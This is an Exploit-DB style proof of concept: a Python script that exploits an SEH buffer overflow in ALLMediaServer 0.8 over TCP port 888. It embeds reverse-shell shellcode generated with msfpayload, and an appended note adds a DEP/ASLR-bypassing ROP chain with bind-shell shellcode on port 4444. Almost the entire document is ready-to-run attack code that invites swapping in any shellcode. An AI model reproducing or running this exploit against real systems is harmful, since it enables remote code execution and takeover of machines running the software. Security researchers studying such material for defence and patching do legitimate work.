# Exploit Title: seh exploit, BOF # Date: 04/07/2012 # Exploit Author: motaz reda # my E-mail: motazkhodair@gmail.com # Software Link: http://allmediaserver.org/ # Version: ALLMediaServer 0.8 # Tested On: Windows 7 ultimate ################################################ #!/usr/bin/python import sys, socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 888)) buffer = "A" * 1072 buffer += "\xeb\x06\x90\x90" #NSEH jmp short 6 buffer += "\xca\x24\xec\x65" # SEH POP POP RETN # msfpayload windows/shell_reverse_tcp # you can replace the shellcode with any shellcode u want buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1" "\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01" "\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17" "\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67" "\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7" "\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02" "\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48" "\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45" "\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1" "\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69" "\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5" "\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0" "\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d" "\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3" "\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49" "\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0" "\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27" "\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02" "\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39" "\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e" "\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58" "\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26" "\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a") s.send(buffer) s.close() ### Exploit-DB note: ### This affects AllMediaSErver 0.94 as well. # Exploit-DB Note: # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn # DEP/ASLR bypass with bind shell on port 4444 buffer = "\x41" * 984 buffer+= "\xe6\x30\x46\x00" # Second ADD esp for stack adjustment # add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe buffer+= "\x41" * 88 # Step over SEH stackAdjust = "\x9e\x6c\x42\x00" # add esp,800 | pop ebx | retn ~ MediaServer.exe # Returns to Second ADD ESP stackAdjust+= "\x42\x42\x42\x42" * 15 # Padding # VirtualProtect into ESI rop = "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\xe0\xe4\x1e\x67" # &kernel32.VirtualProtect ~ rop+= "\x54\xcd\xc6\x6a" # mov eax,dword ptr ds:[eax] | retn ~ rop+= "\x04\xef\x2e\x66" # xchg eax,esi | retn ~ avcodec-53.dll # Puts Kernel31.VirtualProtect # lpAddress param into EBP rop+= "\xb3\x14\xb8\x68" # pop ebp | retn ~ rop+= "\x07\x5d\x0c\x66" # ROP jmp esp | ??? ~ avcodec-53.dll # dwSize into EBX rop+= "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\xff\xfd\xff\xff" # Will negate to 0x201 rop+= "\xbe\x13\x6e\x66" # neg eax | retn rop+= "\x2b\xe2\xf4\x65" # xchg eax,ebx | retn ~ avcodec-53.dll # flNewProtect 0x40 into EDX rop+= "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\xc0\xff\xff\xff" # Will negate to 0x40 rop+= "\xbe\x13\x6e\x66" # neg eax | retn ~ avcodec-53.dll rop+= "\x46\x08\x53\x66" # xchg eax,edx | retn ~ avcoded-53.dll # lpflOldProtect into ECX rop+= "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\x69\xef\x5f\x00" # writeable address ~ avformat-53.dll rop+= "\xeb\x9b\x74\x66" # xchg eax,ecx | retn ~ avcodec-53.dll # RETN into EDI rop+= "\x84\xe6\x75\x66" # pop edi | retn rop+= "\x6d\x9b\xb2\x6a" # retn ROP # Nops in EAX rop+= "\x26\xfa\xf6\x65" # pop eax | retn ~ avcodec-53.dll rop+= "\x90\x90\x90\x90" # PushAD rop+= "\x3a\x18\x75\x66" # pushad | rent ~ avodec-53.dll rop+= "\x90\x90\x90\x90" shellcode =( "\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9" "\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36" "\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a" "\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f" "\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7" "\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84" "\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01" "\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1" "\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8" "\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9" "\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89" "\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79" "\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9" "\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1" "\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd" "\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12" "\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1" "\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82" "\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a" "\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe" "\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4" "\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28" "\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1" "\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d" "\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7" "\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8" "\x96\xac\x69\x29") payload = buffer + stackAdjust + rop + shellcode rest = 1765 - len(payload) exploit = payload + "\xCC" * rest # Send exploit to target's port 888